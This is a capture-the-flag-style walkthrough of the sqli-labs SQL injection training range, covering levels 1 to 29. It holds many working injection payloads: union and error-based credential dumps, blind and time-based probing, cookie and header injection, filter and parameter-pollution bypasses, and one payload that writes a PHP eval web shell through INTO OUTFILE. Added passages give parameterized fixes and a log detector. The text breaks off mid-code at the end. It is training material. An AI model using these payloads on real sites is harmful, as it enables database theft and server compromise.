sqli-labs SQL injection range: complete walkthrough of levels 1-65

I said I would go through it all again, but I stopped after level 10. Useless; I couldn't even finish something that simple.

Picking up where I left off and finishing what I started.

Below are the complete solutions for the sqli-labs range.

Contents:

less1-less10
less10-less20
less20-less30
less30-less40
less40-less50
less50-less65

Levels 1-2: error-based string / numeric injection

The only difference is which quoting character has to be closed.

http://www.sqli-lab.cn/Less-1/?id=1 or 1=1 --

http://www.sqli-lab.cn/Less-1/?id=1' order by 3 --+   # 3 columns

http://www.sqli-lab.cn/Less-1/?id=1' and 1=2 union select 1,2,3 --+   # columns 2 and 3 are displayed

http://www.sqli-lab.cn/Less-1/?id=1' and 1=2 union select 1,version(),database() --+

List all database names:

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

List all table names in the security database:

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

Then extract the column names with the following statement:

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

Dump the usernames and passwords:

http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

Levels 3-4 are the same; only the closing sequence differs, here it has to be closed with ')

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

 

Levels 5-6: the error message is printed, so either boolean-based blind injection or direct error-based injection works.

(1) Error via floor()
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
where payload is the SQL expression whose result you want to read back.
Note that this construction limits the output to 64 characters.

(2) Error via updatexml()
and updatexml(1,payload,1)
This one also limits the output length, to 32 characters at most,
and it constrains the payload's return type: the error only appears when what the payload returns is not in XML format.

(3) Error via extractvalue()
and extractvalue(1, payload)
The output length is limited to 32 characters.

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}
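The root cause shared by levels 1 through 6 is the same: the request parameter is spliced into the SQL text and the driver's error text is echoed back. The following is an added example (not the lab's code) of the hardened form of that lookup, written against the lab's security.users table; the connection credentials and the error_log destination are placeholders, and get_result() assumes the mysqlnd driver.

```php
<?php
// Added example (not lab code): hardened replacement for the Less-1..Less-6 lookup.
// Assumes a mysqli connection to the lab's `security` database; the credentials
// below are hypothetical placeholders.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of returning false

function lookup_user(mysqli $db, string $rawId): ?array
{
    // Allow-list the shape of the input first: the id column is an integer, so
    // anything that is not a plain positive integer is rejected before SQL is involved.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Bind the value as a parameter: the query text is fixed, so a quote, a
    // comment marker or a UNION inside $rawId can never change its structure.
    $stmt = $db->prepare('SELECT username, password FROM users WHERE id = ? LIMIT 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

try {
    $db = new mysqli('127.0.0.1', 'lab', 'lab-password', 'security'); // hypothetical credentials
    $db->set_charset('utf8mb4');
    $row = lookup_user($db, $_GET['id'] ?? '');
    if ($row) {
        echo 'Your Login name: ', htmlspecialchars($row['username']);
    } else {
        echo 'No such user';
    }
} catch (mysqli_sql_exception $e) {
    // Less-5/6 and the floor()/updatexml()/extractvalue() tricks all depend on the
    // driver's error text reaching the browser. Keep it server-side only.
    error_log('lookup failed: ' . $e->getMessage());
    http_response_code(500);
    echo 'Internal error';
}
```

Two things change relative to the lab code: the integer check removes the whole class of string payloads before a query exists, and the catch block is the only place the database error is visible, which is what takes the error-based channel away.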
http://www.sqli-lab.cn/Less-5/?id=1' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

http://www.sqli-lab.cn/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

Table names:

http://www.sqli-lab.cn/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

Dump the columns:

http://www.sqli-lab.cn/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 7,1),floor(rand()*2))as a from information_schema.tables group by a%23

Dump the values:

http://www.sqli-lab.cn/Less-5/?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

Level 7: writing a shell with INTO OUTFILE

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in.... Use outfile......';
}else{
    echo 'You have an error in your SQL syntax'; 
}

$id is wrapped in two sets of parentheses plus single quotes. A correct URL shows the hint to use outfile; an incorrect one only tells you that there was an error.

http://www.sqli-lab.cn/Less-7/?id=1')) union select null,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e,null into outfile 'E:\\phpstudy\\WWW\\sqli\\Less-7\\1.php' --+

Level 8: boolean-based blind injection

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
}
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,1,1))) = 115--+

http://www.sqli-lab.cn/Less-8/?id=1' and (length(database())) = 8 --+   # database name length = 8

Blind injection yields the database name: security

http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,1,1))) = 115 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,2,1))) = 101 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,3,1))) = 99 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,4,1))) = 117 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+

Next, determine the length of the table names:

http://www.sqli-lab.cn/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

The fourth table is found to be users:

http://www.sqli-lab.cn/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

Everything else works the same way; only the payload changes.

Levels 9 and 10: time-based blind injection

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
    echo 'You are in...........';
}
http://www.sqli-lab.cn/Less-9/?id=1'+and+if(1=1, sleep(5), null)+ --+

Infer the result from the delay:

http://www.sqli-lab.cn/Less-9/?id=1' and (length(database())) = 8 +and+if(1=1, sleep(5), null)+ --+
http://www.sqli-lab.cn/Less-9/?id=1' and (ascii(substr((select database()) ,1,1))) = 115 +and+if(1=1, sleep(1), null)+ --+

Then guess it character by character.
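Levels 8 through 10 leave a very regular trace: hundreds of near-identical requests that differ only in a position and a character code, or that carry a sleep(). The following is an added example (not part of the original post) of a small detector over log lines in the ID:&lt;value&gt; format that the lab itself writes to result.txt; the sample lines are constructed for this example.

```php
<?php
// Added example (not part of the original post): flag the character-by-character
// probing of Less-8/9/10 in log lines of the form "ID:<value>" (the format the
// lab writes to result.txt). Sample lines below are constructed.

const PROBE_PATTERNS = [
    'time-delay'   => '/\b(sleep|benchmark)\s*\(/i',
    'char-probe'   => '/\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(/i',
    'length-probe' => '/\blength\s*\(\s*\(?\s*(select|database|user|version)/i',
    'tautology'    => '/\b(and|or)\s+[\'"]?\d+[\'"]?\s*=\s*[\'"]?\d+/i',
];

// Returns the labels of every pattern that matches the logged id value.
function classify_id(string $value): array
{
    $hits = [];
    foreach (PROBE_PATTERNS as $label => $re) {
        if (preg_match($re, $value)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// Walks the log, keeps the flagged lines and a count per label so a burst of
// 'char-probe' hits stands out even if each single request looks harmless.
function scan_log(array $lines): array
{
    $report = ['flagged' => [], 'by_label' => []];
    foreach ($lines as $n => $line) {
        if (!preg_match('/^ID:(.*)$/', trim($line), $m)) {
            continue;
        }
        $hits = classify_id($m[1]);
        if ($hits) {
            $report['flagged'][] = ['line' => $n + 1, 'value' => $m[1], 'labels' => $hits];
            foreach ($hits as $h) {
                $report['by_label'][$h] = ($report['by_label'][$h] ?? 0) + 1;
            }
        }
    }
    return $report;
}

// Constructed sample: two benign lookups and four probes in the style of the walkthrough.
$sample = [
    "ID:1",
    "ID:1' and (length(database())) = 8 --+",
    "ID:1' and (ascii(substr((select database()),1,1))) = 115 --+",
    "ID:1' and if(1=1, sleep(5), null) --+",
    "ID:2",
    "ID:1' or 1=1 --",
];
$report = scan_log($sample);
printf("%d of %d lines flagged\n", count($report['flagged']), count($sample));
foreach ($report['flagged'] as $f) {
    printf("line %d [%s]: %s\n", $f['line'], implode(',', $f['labels']), $f['value']);
}
foreach ($report['by_label'] as $label => $count) {
    printf("%-13s %d\n", $label, $count);
}
```

The per-label counts are the useful signal: a boolean blind extraction of an eight-character name produces dozens of 'char-probe' lines in a row from one client, which is easy to alert on even when each line on its own would be a false positive.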

 

 

 

 

 

 

 

 

 

 

 

Less11

payload:

uname=admin' order by 2#&passwd=1&submit=Submit   // determine the column count

uname=admin' or '1'='1' #&passwd=1&submit=Submit

uname=-qing' union select 1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)##&passwd=1&submit=Submit   // dump all databases

Nothing more to say.

Less12

A small difference from level 11: only the closing sequence changes.

payload:

uname=admin") order by 2#&passwd=1&submit=Submit   // determine the column count

uname=admin") or '1'='1' #&passwd=1&submit=Submit

uname=-qing") union select 1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)##&passwd=1&submit=Submit   // dump all databases

Less13

// connectivity 
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

 

With a comment marker it is easy; without one only a small change is needed.

payload:

uname= qing') or 1=1 -- +&passwd=1&submit=Submit

uname= qing') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit

uname= qing') or 1=1 # &passwd= ') or 1=1 # &submit=Submit

Dump data:

Nothing is echoed back, so go straight to the error-based functions.

uname= qing') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as qing from information_schema.tables group by qing # &passwd= ') or 1=1 # &submit=Submit

uname= qing') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as qing from information_schema.tables group by qing # &passwd= ') or 1=1 # &submit=Submit

uname= qing') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit

uname= qing') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit

uname= qing') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit

uname= qing') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit

uname= qing') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit

Less14

$uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

Only the closing sequence differs from the previous level; nothing more to add.

payload:

uname= qing" union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as qing from information_schema.tables group by qing # &passwd= ') or 1=1 # &submit=Submit

Less15

Boolean-based blind injection closed with a single quote; just guess with the blind-injection statements.

uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit

uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit

Less16

The closing changes to a double quote; nothing more to say.

Less17

Injection into an UPDATE:

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
    if($row)
    {
          //echo '<font color= "#0000ff">';    
        $row1 = $row['username'];      
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
          echo "<br>";
    }

payload:

uname=admin&passwd=qing' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '&submit=Submit

Less18

The content of an HTTP header is put into an INSERT; error-based injection does the job.

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
        if($row1)
            {
            echo '<font color= "#FFFF00" font size = 3 >';
            $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            mysql_query($insert);
            }

payload:

qing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

Less - 19

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
        if($row1)
            {
            echo '<font color= "#FFFF00" font size = 3 >';
            $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
            }

This time the Referer field is concatenated into the INSERT; the same idea as the previous level.

Less - 20

$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600; 
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];           
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

Injection through the cookie field; only the location differs.

payload:

Cookie: uname=' union select 1,database(),6 or 1=1 #;

Less - 21

Cookie injection

YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26 
Note: RHVtYg== is the value Dumb after Base64 encoding.

Almost the same as the previous level, only Base64-encoded.

payload:

') or 1=1 #
Jykgb3IgMT0xICM=

Less - 22

Closed with double quotes; see the previous level, nothing more to say.

Less - 23

Only the comment markers are filtered.

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

payload:

qing' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24

The simplest second-order injection; there is no filtering at all.

login.php:

The input is escaped with mysql_real_escape_string(); unless the encoding is GBK (wide-byte injection), single quotes cannot be used here.

function sqllogin(){

   $username = mysql_real_escape_string($_POST["login_user"]);
   $password = mysql_real_escape_string($_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
   $res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
   $row = mysql_fetch_row($res);
    //print_r($row) ;
   if ($row[1]) {
            return $row[1];
   } else {
              return 0;
   }

}

login_create.php:

//$username=  $_POST['username'] ;
    $username=  mysql_escape_string($_POST['username']) ;
    $pass= mysql_escape_string($_POST['password']);
    $re_pass= mysql_escape_string($_POST['re_password']);
    
    echo "<font size='3' color='#FFFF00'>";
    $sql = "select count(*) from users where username='$username'";
    $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
      $row = mysql_fetch_row($res);

Here the username is later read back out and used in a query without any filtering, so when we register the username we store the injection payload directly in the database, and the injection happens when it is read back:

admin' or 1=1#

Log in as the account admin' or 1=1# and enter the new password qing:

# Validating the user input........
    $username= $_SESSION["username"];
    $curr_pass= mysql_real_escape_string($_POST['current_password']);
    $pass= mysql_real_escape_string($_POST['password']);
    $re_pass= mysql_real_escape_string($_POST['re_password']);
    
    if($pass==$re_pass)
    {    
        $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
        $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
        $row = mysql_affected_rows();

At UPDATE time our original admin' or 1=1 # is read out and placed into the statement, so every password becomes qing.
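The Less-24 lesson is that escaping at the input boundary does not protect a value once it has been stored and read back, because the second query trusts the database. The following is an added example (not the lab's code) of the registration and password-change steps rewritten with bound parameters; it assumes a mysqli connection $db to the lab's security database and, unlike the lab, stores a password hash rather than the plaintext.

```php
<?php
// Added example (not lab code): Less-24 registration and password change with
// bound parameters, so the stored username is data wherever it is read from.
// Assumes a mysqli connection `$db` to the lab's `security` database.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Registration: the stored value is exactly what the user typed. With a bound
// parameter there is nothing to escape now and nothing to decode later.
function create_user(mysqli $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    [$exists] = $stmt->get_result()->fetch_row();
    if ($exists > 0) {
        return false;
    }
    // The lab stores plaintext; this example stores a hash instead.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO users (username, password) VALUES (?, ?)');
    $stmt->bind_param('ss', $username, $hash);
    return $stmt->execute();
}

// Password change: `$username` comes from the session, i.e. from the database,
// which is exactly the "trusted" source the original code did not escape.
// Bound parameters treat it as data regardless of origin, so a stored value such
// as  admin' or 1=1#  only ever matches its own row.
function change_password(mysqli $db, string $username, string $current, string $new): int
{
    $stmt = $db->prepare('SELECT password FROM users WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if (!$row || !password_verify($current, $row['password'])) {
        return 0;
    }
    $hash = password_hash($new, PASSWORD_DEFAULT);
    $stmt = $db->prepare('UPDATE users SET password = ? WHERE username = ?');
    $stmt->bind_param('ss', $hash, $username);
    $stmt->execute();
    return $stmt->affected_rows;   // 1 for the caller's own row, never the whole table
}
```

The design rule this illustrates: parameterise every query, including the ones whose inputs "come from us"; whether a value was escaped on the way in is irrelevant once it is concatenated on the way out.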

 


 



Less - 25

Filtering starts at this level.

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);
    $id= preg_replace('/AND/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

Double-writing the keyword is enough; nothing more to say.

payload:

http://sqli-qing.cn/sqli/Less-25/?id=1' oorr '1'='1

http://sqli-qing.cn/sqli/Less-25/?id=qing' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

Less - 25a

Same as 25, just without the single quote.

http://sqli-qing.cn/sqli/Less-25a/?id=-1 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

Less - 26

This level filters more, which makes it a bit more fun.

function blacklist($id) {
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

Closed with a single quote; filtered: or, and, /*, --, #, spaces, /

payload:

qing'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1

%A0 replaces the space and && replaces and; mind the URL encoding. This needs Linux, so I did not test it.

Less - 26a

One more closing parenthesis; nothing more to say.

Less - 27

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);       //strip out /*
    $id= preg_replace('/[--]/',"", $id);          //Strip out --.
    $id= preg_replace('/[#]/',"", $id);           //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);   //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);    //Strip out union
    $id= preg_replace('/select/s',"", $id);    //Strip out select
    $id= preg_replace('/UNION/s',"", $id);  //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);     //Strip out Union
    $id= preg_replace('/Select/s',"", $id);     //Strip out select
    return $id;
}

A few more filters; changing the keyword case is enough.

payload:

0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1

Less - 27a

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --.
    $id= preg_replace('/[#]/',"", $id);            //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);        //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);        //Strip out union
    $id= preg_replace('/select/s',"", $id);        //Strip out select
    $id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);        //Strip out Union
    $id= preg_replace('/Select/s',"", $id);        //Strip out Select
    return $id;
}

Only the closing sequence differs.

payload:

0"%A0or(1)=(1)%26%26%a0"1

http://sqli-qing.cn/sqli/Less-27/?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1

http://sqli-qing.cn/sqli/Less-27/?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1

Less - 28

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
$id= preg_replace('/[--]/',"", $id);                //Strip out --.
$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
return $id;
}

The combination union select is filtered, and spaces too, so bypass it with union union select select, and replace spaces with %0a as before.

payload:

0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1
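Levels 25 through 28 all show the same weakness: a blacklist of keywords and characters over a value whose legitimate form is a plain integer. The following is an added example (not the lab's code) that runs the Less-26 blacklist() (copied for comparison) and an allow-list check side by side over inputs taken from this walkthrough's own payloads; the inputs are decoded and constructed for the example.

```php
<?php
// Added example (not lab code): the Less-26 blacklist versus an allow-list.
// blacklist26() is the lab's function, reproduced unchanged for comparison;
// validate_id() is the replacement.

function blacklist26(string $id): string
{
    $id = preg_replace('/or/i', '', $id);
    $id = preg_replace('/and/i', '', $id);
    $id = preg_replace('/[\/\*]/', '', $id);
    $id = preg_replace('/[--]/', '', $id);
    $id = preg_replace('/[#]/', '', $id);
    $id = preg_replace('/[\s]/', '', $id);
    $id = preg_replace('/[\/\\\\]/', '', $id);
    return $id;
}

// Allow-list: the id column is an integer, so accept a decimal integer and
// nothing else. There is no keyword to double-write and no space to re-encode.
function validate_id(string $raw): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// Show non-ASCII bytes as \xHH so the %A0 byte stays visible in the output.
function printable(string $s): string
{
    return preg_replace_callback('/[^\x20-\x7e]/', fn($m) => sprintf('\\x%02X', ord($m[0])), $s);
}

// Constructed inputs: two benign ids and three decoded payloads from this page.
// \xA0 is the decoded %A0; without the /u modifier PCRE's \s does not match it.
$inputs = [
    '1',
    '42',
    "1' oorr '1'='1",
    "qing'\xA0union\xA0select\xA01,2,3\xA0from\xA0users",
    "0'\xA0UnIoN\xA0SeLeCt(1),2,3",
];

foreach ($inputs as $in) {
    $after = blacklist26($in);
    $safe  = validate_id($in);
    printf("%-45s blacklist -> %-40s allow-list -> %s\n",
        printable($in), printable($after), $safe === null ? 'REJECT' : "accept $safe");
}
```

The output makes the asymmetry obvious: the blacklist turns "oorr" into "or" and leaves every \xA0 in place, so the rewritten value is still a valid injection, while the allow-list accepts exactly the two integers and rejects the rest without needing to know anything about SQL syntax.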

 

 

 

 

 

 

 

Less - 28a

Simple; nothing more to say.

Less - 29

A very weak "WAF" has been added:

if(isset($_GET['id']))
{
    $qs = $_SERVER['QUERY_STRING'];
    $hint=$qs;
    $id1=java_implimentation($qs);
    $id=$_GET['id'];
    //echo $id1;
    whitelist($id1);
    
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

// connectivity 
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
}

//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input)
{
    $match = preg_match("/^\d+$/", $input);
    if($match)
    {
        //echo "you are good";
        //return $match;
    }
    else
    {    
        header('Location: hacked.php');
        //echo "you are bad";
    }
}

// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);

    foreach($qs_array as $key => $value)
    {
        $val=substr($value,0,2);
        if($val=="id")
        {
            $id_value=substr($value,3,30); 
            return $id_value;
            echo "<br>";
            break;
        }
    }
}

?>

The injection method is parameter pollution.

For example: the page displays the content for id=2, but the WAF checks the earlier id=1. Easy to understand, right?

payload:

http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,version(),database() --+

http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
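The Less-29 defect is a parsing mismatch: java_implimentation() validates the first id= in the query string while PHP's $_GET hands the query the last one. The following is an added example (not the lab's code) of the check done on the value that will actually be used, with duplicated parameters refused outright; the query strings are constructed for the example.

```php
<?php
// Added example (not lab code): closing the Less-29 HPP gap by validating the
// exact value the query will use and refusing a parameter that appears twice.

// Parse the raw query string and return every value for a key, in order.
// parse_str() or $_GET would silently keep only the last one.
function all_values(string $queryString, string $key): array
{
    $found = [];
    foreach (explode('&', $queryString) as $pair) {
        if ($pair === '') {
            continue;
        }
        [$k, $v] = array_pad(explode('=', $pair, 2), 2, '');
        if (urldecode($k) === $key) {
            $found[] = urldecode($v);
        }
    }
    return $found;
}

// Exactly one id, and it must be a positive integer. With duplicates rejected
// there is no "other" copy for the WAF and the query to disagree about.
function checked_id(string $queryString): ?int
{
    $values = all_values($queryString, 'id');
    if (count($values) !== 1) {
        return null;                       // missing or polluted
    }
    $id = filter_var($values[0], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed query strings, including the polluted form described in the post.
$cases = [
    'id=2',
    "id=1&id=2' union select 1,version(),database() --+",
    'id=1&id=1',
    'id=abc',
    'id=%32',          // still "2" after decoding, so accepted
];
foreach ($cases as $qs) {
    $id = checked_id($qs);
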